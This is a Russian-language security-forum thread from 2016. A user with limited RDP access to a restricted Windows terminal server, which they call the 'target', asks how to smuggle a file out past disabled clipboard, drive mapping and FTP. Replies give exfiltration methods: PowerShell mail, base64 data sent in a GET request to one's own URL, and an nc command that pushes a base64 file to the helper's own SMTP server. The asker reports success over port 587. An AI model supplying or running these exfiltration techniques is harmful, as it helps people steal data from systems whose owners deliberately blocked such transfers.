HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 17.03.2016, 00:41
ChuckD
Новичок
Регистрация: 16.03.2016
Сообщений: 6
Провел на форуме:
1602

Репутация: 1
По умолчанию

Здравствуйте! Помогите советом как слить файл с сервера терминалов Windows Server 2008.

Есть доступ к серверу по RDP. Пользователь без админ. прав.

Буфер обмена и подключение дисков запрещено.

IE к интернету не подключается.

Команда FTP подключения к внешним серверам не производит.

пинги на сайты идут.

telnet на 80 порт mail.ru данные получает.

telnet на 25 порт подключается нормально.

Что то ничего в голову не идет.

Нет мыслей?

PS

Почту можно отправить, но как вложение прикрепить???
 
Ответить с цитированием

  #2  
Старый 17.03.2016, 01:30
1qoot1
Познающий
Регистрация: 13.01.2014
Сообщений: 48
Провел на форуме:
17015

Репутация: 1
По умолчанию

powershell + mail : )

или другие вариации.
 
Ответить с цитированием

  #3  
Старый 17.03.2016, 01:50
rct
Постоянный
Регистрация: 13.06.2015
Сообщений: 359
Провел на форуме:
137330

Репутация: 7
По умолчанию

Вариант №1. Файл в base64 и GET на твой урл, который запишет в лог.

Вариант №2. Файл в base64. Поднимаешь у себя любой самый простой smtp-сервер на 25 порту, раз на него с того сервака разрешен конект. В шинде я не шарю вообще, но на линуксе я бы сделал так:

msg="ehlo hello server\nmail from:\nrcpt to:\ndata\nтут_base64_твоего_файла\r \n.\r\n";

echo -ne $msg | nc my_server 25

И смотришь во входящих. Ясень пень, всяких DKIM, PTR и прочих защит не должно быть.
 
Ответить с цитированием

  #4  
Старый 17.03.2016, 02:07
ChuckD
Новичок
Регистрация: 16.03.2016
Сообщений: 6
Провел на форуме:
1602

Репутация: 1
По умолчанию

Спасибо за идеи, бум пробовать завтра!
 
Ответить с цитированием

  #5  
Старый 18.03.2016, 00:13
ChuckD
Новичок
Регистрация: 16.03.2016
Сообщений: 6
Провел на форуме:
1602

Репутация: 1
По умолчанию

Подготовил скриптик, а 25 порт больше не гугу. Закрыли чтоли? Странно, еще вчера работал.

пытаюсь на мылру отправить через 465, так скрипт не пашет, пишет время ожидания истекло...

В общем бьюсь пока
 
Ответить с цитированием

  #6  
Старый 18.03.2016, 00:18
rct
Постоянный
Регистрация: 13.06.2015
Сообщений: 359
Провел на форуме:
137330

Репутация: 7
По умолчанию

Цитата:
Сообщение от ChuckD  

Подготовил скриптик, а 25 порт больше не гугу. Закрыли чтоли? Странно, еще вчера работал.
пытаюсь на мылру отправить через 465, так скрипт не пашет, пишет время ожидания истекло...
В общем бьюсь пока
Мылрушка не пропустит такое письмо даже в спам.
 
Ответить с цитированием

  #7  
Старый 18.03.2016, 00:25
ChuckD
Новичок
Регистрация: 16.03.2016
Сообщений: 6
Провел на форуме:
1602

Репутация: 1
По умолчанию

С локальной машины и с другого сервера (также через RDP подключение) все ходит на ура на мылру через 25, пол дня тестировал. А щас начал на "целевом" пробовать - облом!
 
Ответить с цитированием

  #8  
Старый 18.03.2016, 00:26
ChuckD
Новичок
Регистрация: 16.03.2016
Сообщений: 6
Провел на форуме:
1602

Репутация: 1
По умолчанию

Подсоветуйте как быть, что попробовать...
 
Ответить с цитированием

  #9  
Старый 18.03.2016, 02:23
ChuckD
Новичок
Регистрация: 16.03.2016
Сообщений: 6
Провел на форуме:
1602

Репутация: 1
По умолчанию

Все! Всем спасибо, получилось!

оказывается при SSL через p-shell на 465 порт не идет - это стандартная проблема. Зато хорошо идет через 587! Если он не закрыт конечно
 
Ответить с цитированием

  #10  
Старый 25.03.2016, 00:09
warmi
Новичок
Регистрация: 20.03.2016
Сообщений: 3
Провел на форуме:
943

Репутация: 0
По умолчанию

Цитата:
Сообщение от 1qoot1  

powershell + mail
Можно пример кода?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.